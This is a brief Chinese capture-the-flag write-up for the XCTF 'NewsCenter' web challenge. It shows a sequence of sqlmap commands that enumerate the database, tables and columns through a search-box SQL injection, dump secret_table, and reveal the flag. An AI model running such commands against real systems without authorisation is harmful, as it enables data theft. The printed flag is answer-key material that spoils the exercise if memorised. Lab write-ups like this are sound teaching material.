攻防世界-web(进阶)-NewsCenter

打开文件发现有个搜索框,考虑是XSS或SQL注入,输入弹框语句不显示考虑到SQL注入,抓包将抓包信息保存为txt,用sqlmap爆破。

输入:sqlmap -r “sql.txt”,输出如下数据库版本信息为MYSQL

攻防世界-web(进阶)-NewsCenter

接着输入:sqlmap -r “sql.txt” --current-db 输出当前使用的数据库名为news

攻防世界-web(进阶)-NewsCenter

接着输入:sqlmap -r “sql.txt” -D news --tables输出当前的表名,猜测flag应该在secret_table中

攻防世界-web(进阶)-NewsCenter

输入:sqlmap -r “sql.txt” -D news -T secret_table --columns输入列

攻防世界-web(进阶)-NewsCenter

输入:sqlmap -r “sql.txt” -D news -T secret_table --dump输出flag信息。

攻防世界-web(进阶)-NewsCenter

QCTF{sq1_inJec7ion_ezzz}

上一篇:javascript中的面向对象—— 学习1


下一篇:攻防世界 web进阶区 ics-06